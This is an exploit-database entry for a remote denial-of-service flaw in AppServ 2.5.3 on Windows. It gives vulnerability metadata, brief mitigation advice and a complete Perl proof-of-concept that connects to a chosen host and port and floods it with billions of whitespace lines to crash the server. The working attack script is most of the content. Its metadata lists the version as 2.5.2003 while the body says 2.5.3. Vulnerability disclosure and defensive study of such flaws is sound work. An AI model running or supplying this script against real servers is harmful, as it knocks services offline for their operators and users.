AppServ Open Project Remote Denial of Service Vulnerability

vendor:

AppServ

by:

Rozor - !Sub_Level Security Investigation

5.5

CVSS

MEDIUM

Remote Denial of Service

400

CWE

Product Name: AppServ

Affected Version From: 2.5.2003

Affected Version To: 2.5.2003

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

AppServ Open Project Remote Denial of Service Vulnerability

AppServ Open Project is reportedly affected by a remote denial of service vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request to the affected application, causing it to crash or become unresponsive, resulting in a denial of service condition.

Mitigation:

The vendor has not released a patch for this vulnerability. It is recommended to restrict network access to the affected application or implement a firewall to filter out malicious requests.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15851/info

AppServ Open Project is reportedly affected by a remote denial of service vulnerability.

AppServ 2.5.3 running on Microsoft Windows platforms was reported to be vulnerable. Other versions may be affected as well. 

#Xploit PoC AppServ 2.5.3 "Win32" DoS \\ (0x001)
#appserv-dos.pl
#!C:\Perl\perl.exe
#C:\>perl appserv-dos.pl <tested ip> <port>
#By Rozor - !Sub_Level Security Investigation
#Thank To Miseo
#Tested In LocalHost.

sub banner {
print("--------------------------------------------\n");
print("|                                           |\n");
print("|    Proof Of Concept AppServ 2.5.3 DoS     |\n");
print("|    C:\>appserv-dos.pl <target> <port       |\n");
print("|                                           |\n");
print("|      By Rozor - !Sub_Level Research       |\n");
print("|                                           |\n");
print("---------------------------------------------\n");
}
die banner() unless $ARGV[0];
die banner() unless $ARGV[1];

use IO::Socket::INET;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $space = "\x20";
my $i;
my $l;
my $j;

for ($i=0; $i<8000; $i++)
{
$l.="\x20";
}
print "\n\nAppServ 2.5.3 DoS Proof Of Concept\n .:By Rozor:. !Sub_Level\n";
print "Attack...\n";
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort =>
$port, Proto => 'tcp') ||

die "Error: Conection reused$@\n";
my $buffer="GET / HTTP/1.0\n";
my $m = "$l\n";
send($sock,$buffer,0) || die "Error: Send not found\n";
for($l= 0; $l <8000000000; $l++)
{
print "[ $l - 8000000000 ]\r";
send($sock,$m,0) || die "Error: Send not found\n";
}
print "\nServer DoS Hack\n";
close($sock);